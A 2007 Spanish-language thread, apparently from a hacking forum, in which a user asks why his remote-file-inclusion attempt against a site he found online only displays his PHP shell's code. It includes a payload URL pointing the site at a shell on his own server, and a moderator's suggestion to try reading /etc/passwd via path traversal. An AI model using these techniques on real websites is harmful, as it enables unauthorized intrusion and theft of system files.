elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
12 Octubre 2008, 16:17  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Error al hacer RFI		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Error al hacer RFI  (Leído 496 veces)
Leber

Desconectado Desconectado

Mensajes: 261

"Las estrellas se apagan..."


Ver Perfil
Error al hacer RFI
« en: 14 Junio 2007, 12:21 »
Hola

Veran, navegando por inet, me tope con una pagina vulnerable a RFI, puedo redireccionarla a google, a mi server o a casa de mi abuela. El caso esque tengo 2 shells programadas con codigo php, una con extension .txt y la otra con .gif, pero al hacer:

www.webvulnerable.php?url=http://miwebserver.com/shell.txt&cmd=ls

Me aparece el codigod e mi shell por pantalla, tambien lo he probado con las tipicas c99.txt y tampoco, la subo al server, redirecciono la web vulnerable a mi servidor web donde esta alojada la shell y nada, me muestra todo el codigo por pantalla.

¿Alguna sugerencia?

Gracias y saludos
En línea
"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
yeikos
Colaborador

Desconectado Desconectado

Mensajes: 1.363



Ver Perfil
Re: Error al hacer RFI
« Respuesta #1 en: 14 Junio 2007, 12:31 »
Citar
www.webvulnerable.php?url=http://miwebserver.com/shell.txt?cmd=ls
En línea
Leber

Desconectado Desconectado

Mensajes: 261

"Las estrellas se apagan..."


Ver Perfil
Re: Error al hacer RFI
« Respuesta #2 en: 14 Junio 2007, 12:48 »
Fue un deliz poner el "&", de todos modos, ya lo probe con "?" y tampoco. lo unico que hace es mostrar mi propio codigo por pantalla.

Gracias de todos modos
En línea
"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
yeikos
Colaborador

Desconectado Desconectado

Mensajes: 1.363



Ver Perfil
Re: Error al hacer RFI
« Respuesta #3 en: 14 Junio 2007, 18:20 »
Cita de: Leber en 14 Junio 2007, 12:48
Fue un deliz poner el "&", de todos modos, ya lo probe con "?" y tampoco. lo unico que hace es mostrar mi propio codigo por pantalla.

Gracias de todos modos

Entonces no estamos hablando de un RFI, el servidor puede estar utilizando fopen o un simple iframe.
En línea
Leber

Desconectado Desconectado

Mensajes: 261

"Las estrellas se apagan..."


Ver Perfil
Re: Error al hacer RFI
« Respuesta #4 en: 14 Junio 2007, 23:23 »
Duda aclarada entonces.

Gracias por tu tiempo
En línea
"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
berz3k
Moderador
*****
Desconectado Desconectado

Mensajes: 549



Ver Perfil
Re: Error al hacer RFI
« Respuesta #5 en: 15 Junio 2007, 02:08 »

Intenta mas cosas, como /etc/passwd  o /.../.../ ve que pasa

- berz3k
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats